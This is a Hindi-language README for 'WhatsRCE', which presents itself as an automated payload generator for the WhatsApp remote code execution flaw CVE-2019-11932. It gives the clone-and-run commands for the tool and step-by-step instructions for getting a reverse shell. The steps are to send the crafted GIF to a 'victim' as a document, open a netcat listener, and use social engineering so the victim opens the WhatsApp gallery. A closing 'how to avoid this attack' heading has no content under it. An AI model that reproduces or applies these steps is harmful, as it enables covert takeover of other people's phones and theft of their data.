WhatsRCE
यह CVE-2019-11932 (WhatsApp रिमोट कोड निष्पादन) के लिए एक स्वचालित पेलोड जनरेटर है।
- GCC का स्वचालित इंस्टॉलेशन (कोई हानिकारक कमांड नहीं, आप देख सकते हैं कि यह ओपन-सोर्स है)
- .GIF फ़ाइल में सहेजना
इसका उपयोग कैसे करें?
sudo apt install git
git clone https://github.com/KeepWannabe/WhatsRCE
cd WhatsRCE && bash start.sh
शेल कैसे प्राप्त करें?
- आप पीड़ित उपयोगकर्ता को .GIF फ़ाइल एक दस्तावेज़ के रूप में भेजें, छवि के रूप में नहीं
- और nc/netcat को उस पोर्ट पर सेट करें जो आपने WhatsRCE टूल्स पर सेट किया है {nc -lnvp your_port}
- आप सोशल इंजीनियरिंग हमले का उपयोग कर सकते हैं ताकि पीड़ित इस एक्सप्लॉइट को लॉन्च करने के लिए आकर्षित हों
- पीड़ित को व्हाट्सएप के माध्यम से गैलरी खोलने के लिए कहें और पीड़ित से कोई भी फोटो भेजने के लिए कहें (ज़रूरत नहीं, यह सिर्फ गैलरी में जाना है, कोई समस्या नहीं) उसके बाद कुछ सेकंड बाद आपको पीड़ित से एक शेल कनेक्शन प्राप्त होगा
या बस यह देखें
डेमो वीडियो
https://drive.google.com/file/d/1T-v5XG8yQuiPojeMpOAG6UGr2TYpocIj/view
यदि उपरोक्त लिंक सुलभ नहीं है
https://drive.google.com/open?id=1X9nBlf5oj5ef2UoYGOfusjxAiow8nKEK
इस हमले से कैसे बचें?